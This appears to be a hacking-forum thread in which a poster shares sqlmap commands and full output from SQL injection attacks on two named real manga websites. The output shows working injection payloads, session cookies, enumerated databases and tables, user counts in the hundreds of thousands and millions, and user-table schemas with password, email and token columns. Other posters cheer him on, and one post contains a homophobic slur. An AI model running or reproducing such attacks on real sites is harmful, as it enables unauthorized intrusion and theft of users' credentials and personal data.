| throttle              |
| users                 |
+-----------------------+

Database: manga18_clu_3069
Table: users
[33 columns]
+-----------------------+------------------+
| Column                | Type             |
+-----------------------+------------------+
| name                  | varchar(255)     |
| role                  | varchar(30)      |
| status                | tinyint(1)       |
| about_me              | varchar(5000)    |
| avatar                | tinyint(1)       |
| created_at            | timestamp        |
| email                 | varchar(255)     |
| facebook_id           | varchar(255)     |
| facebook_url          | varchar(255)     |
| google_id             | varchar(255)     |
| id                    | int(10) unsigned |
| instagram_url         | varchar(255)     |
| is_vip                | int(1)           |
| last_login            | timestamp        |
| last_seen             | timestamp        |
| linkedin_url          | varchar(255)     |
| notify                | tinyint(1)       |
| password              | varchar(255)     |
| permissions           | text             |
| pinterest_url         | varchar(255)     |
| show_email_on_profile | tinyint(1)       |
| site_color            | varchar(30)      |
| site_mode             | varchar(30)      |
| slug                  | varchar(255)     |
| telegram_url          | varchar(255)     |
| token                 | varchar(255)     |
| twitter_url           | varchar(255)     |
| updated_at            | timestamp        |
| url_main              | varchar(256)     |
| user_type             | varchar(30)      |
| username              | varchar(255)     |
| vk_url                | varchar(255)     |
| youtube_url           | varchar(255)     |
+-----------------------+------------------+

MrDark · 13.09.2025

Database: readmanganowadm_maindatabase
+-------+---------+
| Table | Entries |
+-------+---------+
| users | 92902 |
+-------+---------+

Код:

(myenv) root@cccc:~# sqlmap -u "https://demonicscans.org/advanced.php?genre[]=1&list=1&orderby=VIEWS%20DESC&status=all" \
  -p "genre[]" \
  --cookie="_lr_env_src_ats=false; _lr_retry_request=true; _sharedID=c81544cf-f36b-40e2-b29e-2a36f3872cf6; _sharedID_cst=zix7LPQsHA%3D%3D; _ym_uid=1757702728382004999; _ym_uid_cst=znv0HA%3D%3D; demon=56487; demonbll=1; demontemp=2c7bc3b2875611f0a06b; gz_page_depth=%7B%22last%22%3A%22https%3A%2F%2Fdemonicscans.org%2Fbookmarks.php%22%2C%22depth%22%3A3%7D; page_load_uuid=a68a32d3-279a-43e1-9477-3688908b4213; reacted_chap_100000002=5; reacted_chap_100000019=5; reacted_chap_100000023=2; reacted_chap_100000038=5; reacted_chap_100011851=5; reacted_chap_100012253=4; reacted_chap_100012779=5; subdemon=1; surfer_uuid=da156012-b183-4a2c-9398-e0d62d0a7f0e; useruid=uid-m7w8cbtfqi1757702932174" \
  --headers="X-Requested-With: XMLHttpRequest" \
  --referer="https://demonicscans.org/" \
  --dbms=mysql \
  --level=5 \
  --risk=3 \
  --batch
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.9.1#dev}
|_ -| . [']     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:18:50 /2025-09-13/

[02:18:51] [INFO] testing connection to the target URL
[02:18:52] [INFO] checking if the target is protected by some kind of WAF/IPS
[02:18:54] [INFO] testing if the target URL content is stable
[02:18:55] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[02:18:56] [WARNING] heuristic (basic) test shows that GET parameter 'genre[]' might not be injectable
[02:18:56] [INFO] testing for SQL injection on GET parameter 'genre[]'
[02:18:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:18:58] [WARNING] reflective value(s) found and filtering out
[02:19:20] [INFO] GET parameter 'genre[]' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[02:19:20] [INFO] testing 'Generic inline queries'
[02:19:20] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[02:19:20] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[02:19:20] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[02:19:20] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[02:19:21] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[02:19:21] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[02:19:21] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[02:19:21] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[02:19:22] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:19:22] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:19:22] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[02:19:22] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[02:19:22] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[02:19:23] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[02:19:23] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:19:23] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[02:19:23] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[02:19:24] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:19:24] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[02:19:24] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[02:19:24] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[02:19:24] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[02:19:24] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[02:19:24] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[02:19:24] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[02:19:24] [INFO] testing 'MySQL inline queries'
[02:19:24] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[02:19:24] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[02:19:25] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[02:19:25] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[02:19:25] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[02:19:25] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[02:19:25] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[02:19:36] [INFO] GET parameter 'genre[]' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[02:19:36] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[02:19:36] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[02:19:37] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[02:19:38] [INFO] target URL appears to have 1 column in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] N
[02:19:42] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[02:19:47] [INFO] target URL appears to be UNION injectable with 1 columns
[02:19:47] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[02:19:52] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[02:19:56] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[02:20:00] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
[02:20:04] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
[02:20:07] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
[02:20:10] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
[02:20:14] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
[02:20:17] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[02:20:21] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[02:20:27] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[02:20:31] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[02:20:35] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[02:20:38] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[02:20:42] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[02:20:46] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[02:20:49] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[02:20:52] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
[02:20:56] [INFO] checking if the injection point on GET parameter 'genre[]' is a false positive
GET parameter 'genre[]' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 528 HTTP(s) requests:
---
Parameter: genre[] (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: genre[]=1' AND 7842=7842-- CEIH&list=1&orderby=VIEWS DESC&status=all

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: genre[]=1' AND (SELECT 9955 FROM (SELECT(SLEEP(5)))lwOx)-- XCEh&list=1&orderby=VIEWS DESC&status=all
---
[02:21:03] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.19
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[02:21:04] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/demonicscans.org'

[*] ending @ 02:21:04 /2025-09-13/

[02:31:21] [INFO] retrieved: readmanganowadm_maindatabase
current database: 'readmanganowadm_maindatabase'

Database: readmanganowadm_maindatabase
[110 tables]
+----------------------------+
| EVENTS_REWARDS             |
| FEATURED                   |
| FIXMNG                     |
| INACTIVE_SPAMMERS          |
| events                     |
| groups                     |
| achievements               |
| achievements_track         |
| active_monsters            |
| active_monsters_attackers  |
| active_pvp                 |
| active_pvp_logs            |
| admins                     |
| alternatives               |
| attack_logs                |
| cards                      |
| categories                 |
| categorymanga              |
| categorynovel              |
| chapreactions              |
| chapserrors                |
| chapters                   |
| claimed_achievements       |
| classes                    |
| classes_skills             |
| collections                |
| collections_log            |
| comments                   |
| commentslikes              |
| contestall                 |
| crawldirect                |
| crawlsoucehost             |
| crawlsource                |
| crawlsourcenv              |
| crawlsourceraw             |
| dailyvar                   |
| dead_monsters_attackers    |
| entries                    |
| event_wave_map             |
| follow                     |
| game_updates               |
| gates                      |
| goblin_feast               |
| inventory                  |
| items                      |
| likess                     |
| live_chat                  |
| logchapsgroups             |
| logchapters                |
| loginlog                   |
| logpages                   |
| logread                    |
| loot_logs                  |
| mangalist                  |
| merchant                   |
| merchant_log               |
| merchant_user_quota        |
| monsters                   |
| monsters_loot              |
| monsters_rewards           |
| nchapters                  |
| nfollow                    |
| nlogchapters               |
| notifications              |
| novels                     |
| npages                     |
| nratings                   |
| orc_cull                   |
| orc_cull_state             |
| orders                     |
| pages                      |
| pets                       |
| pets_inventory             |
| pets_slots                 |
| pets_stages                |
| powers                     |
| profilepictures            |
| pvp_goals_log              |
| pvp_goals_rewards          |
| pvp_logs                   |
| pvp_points                 |
| pvp_ranking_rewards        |
| pvp_ranks                  |
| pvp_season                 |
| pvp_tier_rewards           |
| ratings                    |
| rchap                      |
| recipes                    |
| referrers                  |
| rewards                    |
| server_reset               |
| slots                      |
| stamina_cap                |
| stamina_farm               |
| subreports                 |
| updatedch                  |
| updatedcmntchp             |
| user_equipment             |
| user_equipment_deff        |
| user_pets                  |
| user_pets_def              |
| user_skills                |
| useradmin                  |
| userfollows                |
| users                      |
| usersplat                  |
| waves                      |
| waves_monsters             |
| weekly_damage              |
| weekly_leaderboard_rewards |
+----------------------------+

[02:56:22] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/demonicscans.org'

[*] ending @ 02:56:22 /2025-09-13/

Database: readmanganowadm_maindatabase
Table: users
[29 columns]
+------------------+--------------+
| Column           | Type         |
+------------------+--------------+
| LEVEL            | int(11)      |
| ATTACK           | int(11)      |
| CHAPSREAD        | int(11)      |
| CHAT_BAN         | int(11)      |
| CLASS            | int(11)      |
| CLASS_RANK       | int(11)      |
| DEFENSE          | int(11)      |
| EMAIL            | varchar(100) |
| GEMS             | int(11)      |
| GOLD             | int(11)      |
| ID               | int(11)      |
| LAST_ATTACK_TIME | datetime     |
| LUCK             | int(11)      |
| MAX_STAMINA      | int(11)      |
| NOADSDATE        | date         |
| PASSWORD         | varchar(100) |
| PICTURE          | varchar(200) |
| POINTS           | double       |
| PVP_COINS        | int(11)      |
| REGDATE          | date         |
| SHOWLATESTREAD   | varchar(20)  |
| STAMINA          | int(11)      |
| STAT_POINTS      | int(11)      |
| TOKEN            | varchar(50)  |
| USERNAME         | varchar(100) |
| usertoken        | varchar(100) |
| VERIFIED         | varchar(10)  |
| VERIFYCODE       | varchar(20)  |
| XP               | int(11)      |
+------------------+--------------+

[03:06:33] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/demonicscans.org'

[*] ending @ 03:06:33 /2025-09-13/

Baiden · 13.09.2025

Bro, keep going! You're doing well.

Anwar · 13.09.2025

Bro thx, good job :smile10:

MrDark · 14.09.2025

Gay boy cartoons )))) wtf

lol

Database: bl_comic
+--------------+---------+
| Table | Entries |
+--------------+---------+
| qiswl_member | 1752753 |
+--------------+---------+

Код:

(myenv) root@E02S29:~# sqlmap -u "https://boylove.cc/home/index/dailyupdate1/weekday/*/page/2"   --cookie="PHPSESSID=17781a2d5a230d756cb625fad04a700c; _clck=aa2yzv%5E2%5Efza%5E0%5E2082; _clsk=vnu668%5E1757754974429%5E31%5E0%5Ee.clarity.ms%2Fcollect; autoSignRs=1; bulletin_new_31=1; dark=N; history=%5B%7B%22manhua_id%22%3A31373%2C%22manhua_title%22%3A%22%5Cu7070%5Cu70ec%5Cu503e%5Cu8986%5Cu4e4b%5Cu6d77%22%2C%22manhua_image%22%3A%22%5C%2Fbookimages%5C%2Fimg%5C%2F20250817%5C%2F8ead0a501585076c15615518f0accd6b.webp%22%2C%22manhua_type%22%3A1%2C%22manhua_vipcanread%22%3A0%7D%5D; lang=CN; returnOct=true; rfv=https%3A%2F%2Fboylove.cc%2Fhome%2Fbook%2Findex%2Fid%2F; shunt=3; todayBrowseDay=true; todayBrowseMonth=true; type=1"   --technique=E   --dbms=mysql   --level=5   --risk=3   --dbs --flush-session --batch
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.9#pip}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:43:43 /2025-09-14/

custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[02:43:43] [INFO] flushing session file
[02:43:43] [INFO] testing connection to the target URL
[02:43:44] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
[02:43:44] [INFO] checking if the target is protected by some kind of WAF/IPS
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
[02:43:55] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[02:43:56] [INFO] testing for SQL injection on URI parameter '#1*'
[02:43:56] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[02:44:15] [WARNING] reflective value(s) found and filtering out
[02:44:19] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[02:44:43] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[02:45:06] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[02:45:30] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[02:45:52] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[02:46:15] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[02:46:39] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[02:47:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:47:25] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:47:48] [INFO] testing 'MySQL >= 5.0 (inline) error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:47:49] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[02:48:12] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[02:48:35] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[02:48:58] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[02:49:22] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:49:45] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[02:50:08] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
got a 302 redirect to 'https://boylove.cc/home/index/dailyupdate1'. Do you want to follow? [Y/n] Y
[02:50:21] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:50:28] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[02:50:28] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[02:50:28] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[02:50:28] [INFO] URI parameter '#1*' is 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 917 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: error-based
    Title: MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)
    Payload: https://boylove.cc/home/index/dailyupdate1/weekday/GTID_SUBSET(CONCAT(0x7171766a71,(SELECT (ELT(2720=2720,1))),0x71717a7071),2720)/page/2
---
[02:50:28] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[02:50:31] [INFO] fetching database names
[02:50:31] [INFO] retrieved: 'information_schema'
[02:50:31] [INFO] retrieved: 'bl_comic'
available databases [2]:
[*] bl_comic
[*] information_schema

[02:50:31] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 837 times
[02:50:31] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/boylove.cc'

[*] ending @ 02:50:31 /2025-09-14/

(myenv) root@E02S29:~# sqlmap -u "https://boylove.cc/home/index/dailyupdate1/weekday/*/page/2"   --cookie="PHPSESSID=17781a2d5a230d756cb625fad04a700c; _clck=aa2yzv%5E2%5Efza%5E0%5E2082; _clsk=vnu668%5E1757754974429%5E31%5E0%5Ee.clarity.ms%2Fcollect; autoSignRs=1; bulletin_new_31=1; dark=N; history=%5B%7B%22manhua_id%22%3A31373%2C%22manhua_title%22%3A%22%5Cu7070%5Cu70ec%5Cu503e%5Cu8986%5Cu4e4b%5Cu6d77%22%2C%22manhua_image%22%3A%22%5C%2Fbookimages%5C%2Fimg%5C%2F20250817%5C%2F8ead0a501585076c15615518f0accd6b.webp%22%2C%22manhua_type%22%3A1%2C%22manhua_vipcanread%22%3A0%7D%5D; lang=CN; returnOct=true; rfv=https%3A%2F%2Fboylove.cc%2Fhome%2Fbook%2Findex%2Fid%2F; shunt=3; todayBrowseDay=true; todayBrowseMonth=true; type=1"   --technique=E   --dbms=mysql   --level=5   --risk=3   --batch -D bl_comic --tables
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.9#pip}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:51:12 /2025-09-14/

custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[02:51:12] [INFO] testing connection to the target URL
[02:51:13] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: error-based
    Title: MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)
    Payload: https://boylove.cc/home/index/dailyupdate1/weekday/GTID_SUBSET(CONCAT(0x7171766a71,(SELECT (ELT(2720=2720,1))),0x71717a7071),2720)/page/2
---
[02:51:13] [INFO] testing MySQL
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
[02:51:13] [INFO] confirming MySQL
[02:51:14] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[02:51:14] [INFO] fetching tables for database: 'bl_comic'
[02:51:15] [INFO] retrieved: 'qiswl_aa_test'
[02:51:15] [INFO] retrieved: 'qiswl_ad_group'
[02:51:15] [INFO] retrieved: 'qiswl_admin_user'
[02:51:16] [INFO] retrieved: 'qiswl_adopt'
[02:51:16] [INFO] retrieved: 'qiswl_ads'
[02:51:16] [INFO] retrieved: 'qiswl_ads_color_text'
[02:51:16] [INFO] retrieved: 'qiswl_app_setting'
[02:51:16] [INFO] retrieved: 'qiswl_article'
[02:51:17] [INFO] retrieved: 'qiswl_article_comment'
[02:51:17] [INFO] retrieved: 'qiswl_article_comment_thumbs'
[02:51:17] [INFO] retrieved: 'qiswl_article_comment_thumbs_down'
[02:51:17] [INFO] retrieved: 'qiswl_article_thumbs'
[02:51:17] [INFO] retrieved: 'qiswl_audit_tags_log'
[02:51:17] [INFO] retrieved: 'qiswl_auth_group'
[02:51:18] [INFO] retrieved: 'qiswl_auth_group_access'
[02:51:18] [INFO] retrieved: 'qiswl_auth_menus'
[02:51:18] [INFO] retrieved: 'qiswl_auth_rule'
[02:51:18] [INFO] retrieved: 'qiswl_avator'
[02:51:18] [INFO] retrieved: 'qiswl_badkey'
[02:51:19] [INFO] retrieved: 'qiswl_banner'
[02:51:19] [INFO] retrieved: 'qiswl_blacklist'
[02:51:19] [INFO] retrieved: 'qiswl_browse_count'
[02:51:19] [INFO] retrieved: 'qiswl_capter'
[02:51:19] [INFO] retrieved: 'qiswl_capter_zip'
[02:51:20] [INFO] retrieved: 'qiswl_category'
[02:51:20] [INFO] retrieved: 'qiswl_config'
[02:51:20] [INFO] retrieved: 'qiswl_convert_schedule'
[02:51:20] [INFO] retrieved: 'qiswl_deleted_image'
[02:51:20] [INFO] retrieved: 'qiswl_distribution'
[02:51:21] [INFO] retrieved: 'qiswl_diyu'
[02:51:21] [INFO] retrieved: 'qiswl_duzhequn'
[02:51:21] [INFO] retrieved: 'qiswl_event'
[02:51:21] [INFO] retrieved: 'qiswl_event_avator'
[02:51:21] [INFO] retrieved: 'qiswl_event_cw_member_word'
[02:51:21] [INFO] retrieved: 'qiswl_event_time'
[02:51:22] [INFO] retrieved: 'qiswl_eventq'
[02:51:22] [INFO] retrieved: 'qiswl_eventq_result'
[02:51:22] [INFO] retrieved: 'qiswl_exec_each_time'
[02:51:22] [INFO] retrieved: 'qiswl_feedback'
[02:51:22] [INFO] retrieved: 'qiswl_feedback_item'
[02:51:23] [INFO] retrieved: 'qiswl_feedback_navi'
[02:51:23] [INFO] retrieved: 'qiswl_fenrun'
[02:51:23] [INFO] retrieved: 'qiswl_game_categories'
[02:51:23] [INFO] retrieved: 'qiswl_game_item'
[02:51:23] [INFO] retrieved: 'qiswl_game_uid'
[02:51:23] [INFO] retrieved: 'qiswl_games'
[02:51:24] [INFO] retrieved: 'qiswl_games_event'
[02:51:24] [INFO] retrieved: 'qiswl_history'
[02:51:24] [INFO] retrieved: 'qiswl_indexlist'
[02:51:24] [INFO] retrieved: 'qiswl_indexmarquee'
[02:51:24] [INFO] retrieved: 'qiswl_kuangren'
[02:51:25] [INFO] retrieved: 'qiswl_lanmu'
[02:51:25] [INFO] retrieved: 'qiswl_level_area'
[02:51:25] [INFO] retrieved: 'qiswl_logo'
[02:51:25] [INFO] retrieved: 'qiswl_manhua'
[02:51:25] [INFO] retrieved: 'qiswl_manhua_audit_tags'
[02:51:25] [INFO] retrieved: 'qiswl_manhua_comment'
[02:51:26] [INFO] retrieved: 'qiswl_manhua_comment_thumbs'
[02:51:26] [INFO] retrieved: 'qiswl_manhua_comment_thumbs_down'
[02:51:26] [INFO] retrieved: 'qiswl_manhua_dlsite'
[02:51:26] [INFO] retrieved: 'qiswl_member'
[02:51:26] [INFO] retrieved: 'qiswl_member_chapter'
[02:51:26] [INFO] retrieved: 'qiswl_member_comment_notice'
[02:51:27] [INFO] retrieved: 'qiswl_member_exp_rec'
[02:51:27] [INFO] retrieved: 'qiswl_member_gold_rec'
[02:51:27] [INFO] retrieved: 'qiswl_member_last_login'
[02:51:27] [INFO] retrieved: 'qiswl_member_notice'
[02:51:27] [INFO] retrieved: 'qiswl_member_point'
[02:51:28] [INFO] retrieved: 'qiswl_member_prize_list'
[02:51:28] [INFO] retrieved: 'qiswl_member_statistics'
[02:51:28] [INFO] retrieved: 'qiswl_member_sticker_set'
[02:51:28] [INFO] retrieved: 'qiswl_member_test_regist'
[02:51:28] [INFO] retrieved: 'qiswl_member_viplog'
[02:51:28] [INFO] retrieved: 'qiswl_milktea_item'
[02:51:29] [INFO] retrieved: 'qiswl_notice'
[02:51:29] [INFO] retrieved: 'qiswl_order'
[02:51:29] [INFO] retrieved: 'qiswl_order2'
[02:51:29] [INFO] retrieved: 'qiswl_ovh_chid'
[02:51:29] [INFO] retrieved: 'qiswl_payment'
[02:51:29] [INFO] retrieved: 'qiswl_prize_type'
[02:51:30] [INFO] retrieved: 'qiswl_pro'
[02:51:30] [INFO] retrieved: 'qiswl_record'
[02:51:30] [INFO] retrieved: 'qiswl_scratch_list'
[02:51:30] [INFO] retrieved: 'qiswl_scratch_rec'
[02:51:30] [INFO] retrieved: 'qiswl_sign'
[02:51:31] [INFO] retrieved: 'qiswl_sticker'
[02:51:31] [INFO] retrieved: 'qiswl_sticker_set'
[02:51:31] [INFO] retrieved: 'qiswl_store_class'
[02:51:31] [INFO] retrieved: 'qiswl_store_class_sub'
[02:51:31] [INFO] retrieved: 'qiswl_store_item'
[02:51:32] [INFO] retrieved: 'qiswl_subscribe'
[02:51:32] [INFO] retrieved: 'qiswl_system_error_log'
[02:51:32] [INFO] retrieved: 'qiswl_system_login_log'
[02:51:32] [INFO] retrieved: 'qiswl_system_operation_log'
[02:51:32] [INFO] retrieved: 'qiswl_system_skin'
[02:51:32] [INFO] retrieved: 'qiswl_task'
[02:51:33] [INFO] retrieved: 'qiswl_task_event_record'
[02:51:33] [INFO] retrieved: 'qiswl_task_record'
[02:51:33] [INFO] retrieved: 'qiswl_ticai'
[02:51:33] [INFO] retrieved: 'qiswl_tixian'
[02:51:33] [INFO] retrieved: 'qiswl_tuibo'
[02:51:34] [INFO] retrieved: 'qiswl_tuibo_message'
[02:51:34] [INFO] retrieved: 'qiswl_tuibo_stat'
[02:51:34] [INFO] retrieved: 'qiswl_update_log'
Database: bl_comic
[104 tables]
+-----------------------------------+
| qiswl_aa_test                     |
| qiswl_ad_group                    |
| qiswl_admin_user                  |
| qiswl_adopt                       |
| qiswl_ads                         |
| qiswl_ads_color_text              |
| qiswl_app_setting                 |
| qiswl_article                     |
| qiswl_article_comment             |
| qiswl_article_comment_thumbs      |
| qiswl_article_comment_thumbs_down |
| qiswl_article_thumbs              |
| qiswl_audit_tags_log              |
| qiswl_auth_group                  |
| qiswl_auth_group_access           |
| qiswl_auth_menus                  |
| qiswl_auth_rule                   |
| qiswl_avator                      |
| qiswl_badkey                      |
| qiswl_banner                      |
| qiswl_blacklist                   |
| qiswl_browse_count                |
| qiswl_capter                      |
| qiswl_capter_zip                  |
| qiswl_category                    |
| qiswl_config                      |
| qiswl_convert_schedule            |
| qiswl_deleted_image               |
